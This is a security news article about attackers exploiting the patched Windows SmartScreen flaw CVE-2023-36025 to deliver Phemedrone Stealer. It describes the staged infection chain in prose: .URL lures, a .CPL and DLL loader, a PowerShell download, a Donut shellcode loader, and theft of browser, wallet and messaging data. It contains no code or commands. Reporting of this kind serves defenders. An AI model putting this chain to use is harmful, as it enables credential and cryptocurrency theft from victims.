NEWS  Security  January 16, 2024  Reading time: 2 Minute(s)

Max (RS editor)

In recent cybersecurity developments, threat actors have demonstrated their adaptability by exploiting a now-patched security flaw in Microsoft Windows. This article delves into the sophisticated attack chain orchestrated by these actors, shedding light on their utilization of a notorious information stealer called Phemedrone Stealer.

The Exploited Flaw: CVE-2023-36025

At the core of these attacks is CVE-2023-36025, a security bypass vulnerability in Windows SmartScreen. This flaw allowed threat actors to sidestep Windows Defender SmartScreen protections by enticing users to click on specially crafted Internet Shortcut (.URL) files or hyperlinks. Microsoft addressed this vulnerability in its November 2023 Patch Tuesday updates, emphasizing the critical nature of the security loophole.

Phemedrone Stealer: A Stealthy Information Thief

The weapon of choice for threat actors in these attacks is Phemedrone Stealer, an open-source information stealer actively maintained on GitHub and Telegram. This malware is designed to target web browsers and extract sensitive data from cryptocurrency wallets and popular messaging apps, including Telegram, Steam, and Discord. Phemedrone Stealer goes beyond mere data theft, as it captures screenshots and collects detailed system information such as hardware specifics, location, and operating system details. The stolen data is discreetly transmitted to the attackers via Telegram or their command-and-control (C&C) server.

The Malicious Flow: Exploiting Windows Control Panel

The infection process involves the deployment of malicious Internet Shortcut files hosted on platforms like Discord or cloud services such as FileTransfer.io. Threat actors further conceal these malicious links using URL shorteners. When the victim clicks on the disguised link, a booby-trapped .URL file is executed, enabling it to connect to an actor-controlled server. The execution of a control panel (.CPL) file takes advantage of CVE-2023-36025, bypassing Windows Defender SmartScreen.

Phemedrone Stealer Unveiled

The malicious .CPL file, when executed through the Windows Control Panel process binary, initiates a sequence involving rundll32.exe and a malicious DLL. This DLL acts as a loader, prompting Windows PowerShell to download and execute the next stage of the attack from a GitHub repository. The subsequent payload is a PowerShell loader ("DATA3.txt") that serves as a launchpad for Donut, an open-source shellcode loader. Donut decrypts and executes the Phemedrone Stealer, allowing threat actors to extract sensitive information from compromised systems.

Continuous Threat Evolution

This incident underscores the agility of threat actors who, despite security patches, persistently find ways to exploit vulnerabilities like CVE-2023-36025. The ability to adapt quickly and capitalize on newly disclosed exploits showcases the evolving nature of cyber threats. The implications are far-reaching, as threat actors employ such tactics not only for information theft, as seen with Phemedrone Stealer, but also for the distribution of various malware types, including ransomware.

 COVER IMAGE BY VECTORJUICE ON FREEPIK  / REVIEW SPACE